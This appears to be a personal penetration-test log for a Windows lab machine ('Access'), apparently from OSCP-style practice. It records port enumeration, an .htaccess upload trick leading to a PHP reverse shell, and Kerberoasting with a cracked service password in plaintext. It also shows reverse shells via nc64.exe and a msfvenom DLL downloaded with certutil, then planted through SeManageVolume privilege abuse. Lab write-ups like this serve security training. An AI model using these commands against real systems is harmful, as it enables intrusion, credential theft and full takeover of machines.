🧪 Pentest Log: {{date:2025-08-07}}

🔍 Target Information

• Machine Name: Access
• IP Address: 192.168.123.187
• Operating System: Windows

ip=192.168.123.187

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 53

dig any access.offsec @$ip

dig AXFR @$ip 

Port 80, 443

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://$ip

wpscan -url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

found

http://$ip/uploads

Port 88

Port 135, 593

rpcclient -U '' -N $ip

Port 139, 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 389, 636, 3268, 3269

ldapsearch -H ldap://$ip -x -s base namingcontexts

ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt

Port 5985

💣 Exploitation / Foothold

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

upload .htaccess file

echo "AddType application/x-httpd-php .tty" > .htaccess

upload shell.tty

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

nc -lvnp 80

🧬 Privilege Escalation

👤 Current Access

• User: svc_apache
• Groups: N/A
• Shell Type: web shell

🔍 Enumeration

Kerberoast

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

found svc_mssql's hash, use john to crack the hash

john hashes.kerberoast --wordlist='/home/kali/Documents/oscp/rockyou.txt'

svc_mssql:trustno1

Use Runas to execture command as svc_mssql

Import-Module ./Invoke-RunasCs.ps1

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "nc64.exe 192.168.45.163 -e powershell"

then

whoami /priv

found

SeManageVolumePrivilege

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Abusing Tokens
• Target Binary/Service: SeManageVolume
• Reference / Source: https://github.com/xct/SeManageVolumeAbuse

🔧 Exploit Steps

• Smash to Administrator

https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.163 LPORT=135 -f dll -o tzres.dll

certutil -urlcache -split -f "http://192.168.45.163:8000/tzres.dll" C:\Windows\System32\wbem\tzres.dll

cd C:\Windows\System32\wbem\

nc -lvnp 135

systeminfo